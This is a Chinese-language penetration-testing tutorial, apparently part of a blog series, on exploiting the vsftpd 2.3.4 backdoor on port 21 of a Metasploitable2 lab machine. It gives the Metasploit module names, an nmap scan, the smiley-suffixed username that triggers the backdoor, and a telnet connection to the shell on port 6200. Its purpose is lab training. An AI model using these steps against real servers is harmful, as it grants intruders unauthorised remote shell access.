【端口渗透】21端口vsftpd服务后门

准备写一个专门关于端口渗透的一些小集合，每一篇代表一个端口对应的渗透方法，算不上什么牛逼的技术，但是对于实战时候还是具有一定的参考价值，之前已经发放了大概4-5枚的知识星球邀请码，如想加入可扫描二维码或直接来稿。

0x01 21端口

>use auxiliary/scanner/ftp/ftp_version探测版本 >search vsFTPd 2.3.4 版本号>use exploit/unix/ftp/vsftpd_234_backdoor>show options

0x02 后门

（1）在kali linux中启用metasploit

操作：打开kali linux的命令控制台，输入msfconsole。

实验现象截图：

（2）使用扫描工具nmap对目标靶机进行扫描

操作：nmap -p0-65535 192.168.1.145

实验现象截图：

Metasploitable2（靶机） 在21端口上运行着vsftpd服务，一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”：）“（笑脸符号），这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit的攻击模块自动攻击

（3）远程登录到靶机放入21端口

操作：root@kali:~# telnet 192.168.1.145 21

实验现象截图：

（4）由扫描结果看，在21端口上运行着vsftpd服务，这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”：）“（笑脸符号），这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit的攻击模块自动攻击。

操作：发送一个用户名并且后面加上”：）“（笑脸符号），和密码

user backdoored：）

Pass invalid

实验现象截图：

（5）关闭远程登陆，并远程登录到靶机的6200端口，利用后门成功

操作：root@kali:~# telnet 192.168.1.145 6200

实验现象截图：